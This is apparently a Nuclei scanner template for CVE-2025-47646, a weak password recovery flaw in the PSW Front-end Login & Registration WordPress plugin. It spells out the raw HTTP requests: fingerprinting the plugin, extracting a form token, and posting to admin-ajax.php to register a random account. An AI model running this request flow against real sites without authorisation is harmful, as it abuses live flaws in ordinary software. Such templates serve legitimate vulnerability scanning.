复制
id: CVE-2025-47646
info:
name: PSW Front-end Login & Registration 1.13 - Weak Password Recovery
author: pussycat0x
severity: critical
description: |
PSW Front-end Login & Registration plugin for WordPress contains a weak password recovery mechanism that can be exploited by unauthenticated attackers. This vulnerability affects versions through 1.13 and allows attackers to potentially gain unauthorized access.
reference:
- https://github.com/RootHarpy/CVE-2025-47646
- https://github.com/Nxploited/CVE-2025-47646
- https://patchstack.com/database/wordpress/plugin/psw-login-and-registration/vulnerability/wordpress-psw-front-end-login-registration-1-12-broken-authentication-vulnerability?_s_id=cve
- https://github.com/PuddinCat/GithubRepoSpider
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-47646
cwe-id: CWE-640
epss-score: 0.04659
epss-percentile: 0.88891
tags: cve,cve2025,wordpress,wp-plugin,psw,intrusive
variables:
username: "{{randstr}}"
password: "{{randstr}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "psw_registration"
- "pswlogform"
- "/wp-content/plugins/psw-login-and-registration"
condition: and
internal: true
extractors:
- type: regex
name: token
group: 1
regex:
- 'name="pswforgetform" value="(.*?)"'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: {{RootURL}}
Referer: {{RootURL}}
first_name={{username}}&last_name={{username}}&new_user_name={{username}}&new_user_email={{email}}&new_user_password={{password}}&new_user_password_confirmation={{password}}&action=register_user_front_end&psw_form={{token}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "{{username}}","activation link")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402203a890606b6187e19274bc839f1f6da763bdf9f565a9ecc9aae51c022011d1b50022028e7be71c2f53cb304f094179aa5d1ee0709013bf1541c0505867a5ac89a5543:922c64590222798bb761d5b6d8e72950